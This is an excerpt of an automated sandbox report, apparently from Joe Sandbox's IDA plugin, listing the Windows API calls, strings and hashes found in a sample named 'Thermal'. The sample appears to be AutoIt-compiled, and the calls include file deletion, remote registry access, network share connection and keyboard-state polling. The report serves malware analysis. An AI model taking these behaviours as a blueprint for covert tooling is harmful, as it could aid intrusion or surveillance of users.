                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00189AEF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 0c03f3d00d0d9d23fa630349127d2086242f7bda5df3a340d6f3717c47330f18
                                                      • Instruction ID: 440bf36f067821dece40c674885b99d0697485e16b0dc6e9cdf50ae9f7b9a564
                                                      • Opcode Fuzzy Hash: 0c03f3d00d0d9d23fa630349127d2086242f7bda5df3a340d6f3717c47330f18
                                                      • Instruction Fuzzy Hash: 4FC13CB1D00219ABDF15EF95CC85AEEBBBDEF54300F0440AAF609E7151EB709A848F65
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135BF1
                                                      • GetMenuItemCount.USER32(001E7890), ref: 00170E7B
                                                      • GetMenuItemCount.USER32(001E7890), ref: 00170F2B
                                                      • GetCursorPos.USER32(?), ref: 00170F6F
                                                      • SetForegroundWindow.USER32(00000000), ref: 00170F78
                                                      • TrackPopupMenuEx.USER32(001E7890,00000000,?,00000000,00000000,00000000), ref: 00170F8B
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00170F97
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 2751501086-0
                                                      • Opcode ID: 4d05f049aff5cd9bec9bfd16e954bb03f6016781f80e8f26188e16d6c9afc5be
                                                      • Instruction ID: 281159c1e247f4369dba95a8e03f0825054a2eb93a0cfa2a4ed3092fb538ab67
                                                      • Opcode Fuzzy Hash: 4d05f049aff5cd9bec9bfd16e954bb03f6016781f80e8f26188e16d6c9afc5be
                                                      • Instruction Fuzzy Hash: 4A71E270644715FFEB369B54CC85FAABF69FF08768F104216F618AA1D0CBB16850DB90
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • _memset.LIBCMT ref: 00178489
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001784BE
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001784DA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001784F6
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00178520
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00178548
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00178553
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00178558
                                                      Strings
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: 7e67f0822c93aca17221a7a9ca96ab4e47af3fa2dc73d18a301e8ee8cb3187e9
                                                      • Instruction ID: 49d96755062d1f7bf2b0ea9c41ed781b318cc0b79e89408507c1c3c7bf6d691d
                                                      • Opcode Fuzzy Hash: 7e67f0822c93aca17221a7a9ca96ab4e47af3fa2dc73d18a301e8ee8cb3187e9
                                                      • Instruction Fuzzy Hash: 7141E572C5022DABCF11EBA4DC95AEEB779BF18340F044569F815A2261EB309E44CB90
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 4228fe0a5374228368182349e5cd3a234aa6be12dacf2ab9e30f95bc92179722
                                                      • Instruction ID: 29631796543a8047b89e561f7e56b094cb0cdd52a562f515cb74c0a6178182d2
                                                      • Opcode Fuzzy Hash: 4228fe0a5374228368182349e5cd3a234aa6be12dacf2ab9e30f95bc92179722
                                                      • Instruction Fuzzy Hash: C5415D7890025AEBDF05EF94D951AEA3724BF67310F604915FC525B2A2DB30ED19CBA0
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0013153B: _memmove.LIBCMT ref: 001315C4
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001858EB
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00185901
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00185912
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00185924
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00185935
                                                      Strings
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: ae48c8711806ce10410c55feb9aea9892fb0aadb746c944b924731b57d6f2195
                                                      • Instruction ID: 84f55e7a82bd4937200666bd1c743b665b56b7733440d761ced4c9420ea22361
                                                      • Opcode Fuzzy Hash: ae48c8711806ce10410c55feb9aea9892fb0aadb746c944b924731b57d6f2195
                                                      • Instruction Fuzzy Hash: 6B119431950129F9D720B7A5DC9AEFF7B7CFBE1B54F41082AB402A21D1DF605E04CAA0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: e06d7da639ee0dbaa05bd4e944bd7325414a284f68d701fe85d809d47c03121e
                                                      • Instruction ID: d2013e4dac9b8b775bdead7b06774e46ee2f4f5298d906b379dca6c1f523f07e
                                                      • Opcode Fuzzy Hash: e06d7da639ee0dbaa05bd4e944bd7325414a284f68d701fe85d809d47c03121e
                                                      • Instruction Fuzzy Hash: 85110631905119ABCB25BB649C4AEEB77BCDF54720F0402A6F049961A1EF709BC58F50
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00185535
                                                        • Part of subcall function 0014083E: timeGetTime.WINMM(?,00000002,0012C22C), ref: 00140842
                                                      • Sleep.KERNEL32(0000000A), ref: 00185561
                                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00185585
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001855A7
                                                      • SetActiveWindow.USER32 ref: 001855C6
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001855D4
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 001855F3
                                                      • Sleep.KERNEL32(000000FA), ref: 001855FE
                                                      • IsWindow.USER32 ref: 0018560A
                                                      • EndDialog.USER32(00000000), ref: 0018561B
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: a5235d242a690014aedd6a94aa6789af0a7e4330e47be13be32035404a4d73ee
                                                      • Instruction ID: 3fe4dbf9d3d7974d5da84f6e1a6d6ae8cc9d02226474a9fc8321ff7e4123edc5
                                                      • Opcode Fuzzy Hash: a5235d242a690014aedd6a94aa6789af0a7e4330e47be13be32035404a4d73ee
                                                      • Instruction Fuzzy Hash: A821C0B0204A45AFE7526BA0EDC9A3A3BABEB48385F141118F506859B1DF719ED0DF31
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CoInitialize.OLE32(00000000), ref: 0018DC2D
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0018DCC0
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0018DCD4
                                                      • CoCreateInstance.OLE32(001B3D4C,00000000,00000001,001DB86C,?), ref: 0018DD20
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0018DD8F
                                                      • CoTaskMemFree.OLE32(?,?), ref: 0018DDE7
                                                      • _memset.LIBCMT ref: 0018DE24
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0018DE60
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0018DE83
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0018DE8A
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0018DEC1
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0018DEC3
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 24f1b677eff47d1d9cf7d0b38ef22bfd1fdf2e22011360a27655fc5b9cd40b96
                                                      • Instruction ID: b8a3c02dbf303625ed7fc120cc4c12b8fd972372c84e8b38bb4bbff3eb3607ed
                                                      • Opcode Fuzzy Hash: 24f1b677eff47d1d9cf7d0b38ef22bfd1fdf2e22011360a27655fc5b9cd40b96
                                                      • Instruction Fuzzy Hash: DBB1DA75A00219AFDB04EFA4D888DAEBBB9FF48314B148559F905EB251DB30EE45CF50
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00180896
                                                      • SetKeyboardState.USER32(?), ref: 00180901
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00180921
                                                      • GetKeyState.USER32(000000A0), ref: 00180938
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00180967
                                                      • GetKeyState.USER32(000000A1), ref: 00180978
                                                      • GetAsyncKeyState.USER32(00000011), ref: 001809A4
                                                      • GetKeyState.USER32(00000011), ref: 001809B2
                                                      • GetAsyncKeyState.USER32(00000012), ref: 001809DB
                                                      • GetKeyState.USER32(00000012), ref: 001809E9
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00180A12
                                                      • GetKeyState.USER32(0000005B), ref: 00180A20
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 2b2993fbfd2d0c783b67021069b55f5d03064722356bead7fa5f64677a6595df
                                                      • Instruction ID: f6c9802b20194eb0148eb41d4ed7dd5a370abb2dbc2d928e44ffa7371cbd0133
                                                      • Opcode Fuzzy Hash: 2b2993fbfd2d0c783b67021069b55f5d03064722356bead7fa5f64677a6595df
                                                      • Instruction Fuzzy Hash: A451C521E0478C29FB76FBA088507AAABB49F16384F084599C5C6575C3DB649B8CCFA1
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0017CE1C
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CE2E
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0017CE8C
                                                      • GetDlgItem.USER32(?,00000002), ref: 0017CE97
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CEA9
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0017CEFD
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CF0B
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CF1C
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0017CF5F
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0017CF6D
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0017CF8A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0017CF97
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 2f6bdb0634cff865c95db15577cfd1ff024c3e2a808402d6c78846ba4c1b3bc7
                                                      • Instruction ID: 724c8617f6e4e2dafd33daccbfc21a0b5ede9fc5f0991b5de5b683a48875c1d8
                                                      • Opcode Fuzzy Hash: 2f6bdb0634cff865c95db15577cfd1ff024c3e2a808402d6c78846ba4c1b3bc7
                                                      • Instruction Fuzzy Hash: 4C513271B00205AFDF18CF69DD99AAEBBB6EB8C710F14822DF519D7690DB70AD408B50
                                                      APIs
                                                        • Part of subcall function 00121F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00122412,?,00000000,?,?,?,?,00121AA7,00000000,?), ref: 00121F76
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001224AF
                                                      • KillTimer.USER32(-00000001,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0012254A
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0015BFE7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C018
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C02F
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C04B
                                                      • DeleteObject.GDI32(00000000), ref: 0015C05D
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: dcf97618284bb4ed9df1d3a05d587389cc528eb8bcd868bed55aa28a7038a71b
                                                      • Instruction ID: 63b8063849952b872ede8985ba7d4b0d87545e1e5fb944c6642523157b2aef90
                                                      • Opcode Fuzzy Hash: dcf97618284bb4ed9df1d3a05d587389cc528eb8bcd868bed55aa28a7038a71b
                                                      • Instruction Fuzzy Hash: 4961AD315047A0EFEB25AF14ED88B2EB7F1FB54312F108619E4524A9A0C770A8E1DF91
                                                      APIs
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      • GetSysColor.USER32(0000000F), ref: 001225AF
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 8cbed6d368c38791db778a39b2f2f4dcbe57101a378514508955a3693e7f2da5
                                                      • Instruction ID: d7bbb894b4752458f2945ce375ab952bfc8c80feeba549824eb6c6537c2839f7
                                                      • Opcode Fuzzy Hash: 8cbed6d368c38791db778a39b2f2f4dcbe57101a378514508955a3693e7f2da5
                                                      • Instruction Fuzzy Hash: 3441B232104150BFDB255F28A888BBD3766FB0A331F194361FD658E1E1D7348D91DB61
                                                      APIs
                                                        • Part of subcall function 00140B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00132A3E,?,00008000), ref: 00140BA7
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00132ADF
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00132C2C
                                                        • Part of subcall function 00133EBE: _wcscpy.LIBCMT ref: 00133EF6
                                                        • Part of subcall function 0014386D: _iswctype.LIBCMT ref: 00143875
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-3738523708
                                                      • Opcode ID: 54b69540191c88c97d6b28d2307c7e2e87c5e72a5e2a59139ee5d9eb370711f8
                                                      • Instruction ID: 933792a8762fc2f55a7e9e3198b78760b43b950e63fa22ec52ad51d8a24dabed
                                                      • Opcode Fuzzy Hash: 54b69540191c88c97d6b28d2307c7e2e87c5e72a5e2a59139ee5d9eb370711f8
                                                      • Instruction Fuzzy Hash: 6E0290711083419FC724EF24C881AAFBBF5BFA9354F10492DF499972A2DB31DA49CB52
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,001B0980), ref: 0018AF4E
                                                      • GetDriveTypeW.KERNEL32(00000061,001DB5F0,00000061), ref: 0018B018
                                                      • _wcscpy.LIBCMT ref: 0018B042
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 4bf079e09bbe2832e6b98257620ab60bb3ead8e019389ec5df2acc209f23f566
                                                      • Instruction ID: c1bca4714847cd85ecb5ba4e4129d7baf59563cb7387a46ffae84f124181cd7e
                                                      • Opcode Fuzzy Hash: 4bf079e09bbe2832e6b98257620ab60bb3ead8e019389ec5df2acc209f23f566
                                                      • Instruction Fuzzy Hash: A551BD701083159BC314EF14D891AAFB7A5FFA4704F90491EF5965B2A2EB30EE09CF82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 4864af508d7414fa4033aa3c3452a431c16ada4e19f9c36c0a2d14cfa1cd7d12
                                                      • Instruction ID: aa9af50bbb38cb09554f3c4d370f86bfc9a31dd7a76a9f235aca5715a6ff81a8
                                                      • Opcode Fuzzy Hash: 4864af508d7414fa4033aa3c3452a431c16ada4e19f9c36c0a2d14cfa1cd7d12
                                                      • Instruction Fuzzy Hash: EE41F471604209EFEB38DF74E842E7A73E8EF15300F20446EE559DB292EB719945CB10
                                                      APIs
                                                      • _memset.LIBCMT ref: 001A778F
                                                      • CreateMenu.USER32 ref: 001A77AA
                                                      • SetMenu.USER32(?,00000000), ref: 001A77B9
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A7846
                                                      • IsMenu.USER32(?), ref: 001A785C
                                                      • CreatePopupMenu.USER32 ref: 001A7866
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A7893
                                                      • DrawMenuBar.USER32 ref: 001A789B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 3bf032ff7aec40042c6428648981824f8c6a21aa437e7d92d7bf50f722b109d2
                                                      • Instruction ID: 653dd0b8f6fdd359c39819c559c0fa6c6dd7c2c33d119c95281059496e8a9eb6
                                                      • Opcode Fuzzy Hash: 3bf032ff7aec40042c6428648981824f8c6a21aa437e7d92d7bf50f722b109d2
                                                      • Instruction Fuzzy Hash: 40414778A00209EFDB20DF64D888EAABBB5FF49310F154129F945A73A0D731AA10CF50
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001A7B83
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 001A7B8A
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001A7B9D
                                                      • SelectObject.GDI32(00000000,00000000), ref: 001A7BA5
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 001A7BB0
                                                      • DeleteDC.GDI32(00000000), ref: 001A7BB9
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001A7BC3
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 001A7BD7
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 001A7BE3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 58206d15bc41eefaa256e37bb41901961b973c0ba097cf84164cf42a91af4e9d
                                                      • Instruction ID: 8680007a3812ab3134f91ba08be0e2cc16bc886a343929b83f681595d02bdf49
                                                      • Opcode Fuzzy Hash: 58206d15bc41eefaa256e37bb41901961b973c0ba097cf84164cf42a91af4e9d
                                                      • Instruction Fuzzy Hash: 853165B6104218ABDF129FA4DC49FEB3B69EF0E360F100315FA55A61E0D731E960DBA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 0014706B
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • __gmtime64_s.LIBCMT ref: 00147104
                                                      • __gmtime64_s.LIBCMT ref: 0014713A
                                                      • __gmtime64_s.LIBCMT ref: 00147157
                                                      • __allrem.LIBCMT ref: 001471AD
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001471C9
                                                      • __allrem.LIBCMT ref: 001471E0
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001471FE
                                                      • __allrem.LIBCMT ref: 00147215
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00147233
                                                      • __invoke_watson.LIBCMT ref: 001472A4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction ID: 5321c5ce6f519156f82ed1f7f489152666140397b30f3e9a77c2b10e45a05a97
                                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction Fuzzy Hash: 3F711A71A05717ABD714DF78CC41B6AB3A8AF25364F14423AF924E72D1E7B0D94487D0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00182CE9
                                                      • GetMenuItemInfoW.USER32(001E7890,000000FF,00000000,00000030), ref: 00182D4A
                                                      • SetMenuItemInfoW.USER32(001E7890,00000004,00000000,00000030), ref: 00182D80
                                                      • Sleep.KERNEL32(000001F4), ref: 00182D92
                                                      • GetMenuItemCount.USER32(?), ref: 00182DD6
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00182DF2
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00182E1C
                                                      • GetMenuItemID.USER32(?,?), ref: 00182E61
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00182EA7
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182EBB
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182EDC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
